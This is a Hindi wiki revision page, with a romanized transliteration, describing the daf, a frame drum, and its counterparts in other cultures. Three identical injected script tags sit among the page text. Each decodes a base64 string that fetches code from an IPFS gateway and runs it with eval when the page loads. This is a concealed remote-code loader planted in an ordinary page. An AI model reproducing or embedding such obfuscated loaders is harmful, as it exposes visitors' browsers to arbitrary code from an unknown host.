Difference between revisions of "डफ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*डफ एक प्राचीन [[वाद्य यंत्र]] है।  
+
*डफ एक [[आनद्ध वाद्य|आनद्ध]] वाद्य यंत्र है।
*डफ आनद्ध, एक बृहद व्यास के चक्राकार काष्ठखण्ड की एक ओर चर्म द्वारा आच्छादित यंत्र है।  
+
*यह एक बृहद व्यास के चक्राकार काष्ठखण्ड की एक ओर चर्म द्वारा आच्छादित यंत्र है।  
 
*डफ वाद्य के अनुरूप ही [[अरब]] का 'डफ', [[यहूदी धर्म|यहूदी]] लोगों का 'टफ', [[मिस्र]] का 'टेम्बोरिन', [[इंग्लैंड]] का 'टेबोरेट' आदि वाद्य हैं।  
 
*डफ वाद्य के अनुरूप ही [[अरब]] का 'डफ', [[यहूदी धर्म|यहूदी]] लोगों का 'टफ', [[मिस्र]] का 'टेम्बोरिन', [[इंग्लैंड]] का 'टेबोरेट' आदि वाद्य हैं।  
 
*डफ का व्यवहार आज भी भारतवर्ष में यायावर श्रेणी में लोगों में प्रचलित है।  
 
*डफ का व्यवहार आज भी भारतवर्ष में यायावर श्रेणी में लोगों में प्रचलित है।  

Revision as of 13:21, 29 April 2011

  • daph ek anaddh vady yantr hai.
  • yah ek brihad vyas ke chakrakar kashthakhand ki ek or charm dvara achchhadit yantr hai.
  • daph vady ke anuroop hi arab ka 'daph', yahoodi logoan ka 'taph', misr ka 'temborin', ianglaiand ka 'teboret' adi vady haian.
  • daph ka vyavahar aj bhi bharatavarsh mean yayavar shreni mean logoan mean prachalit hai.
  • kansart mean bhi koee-koee daph vady ka vyavahar karate haian.
  • prachin dhrupad mean bhi isaka ullekh hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh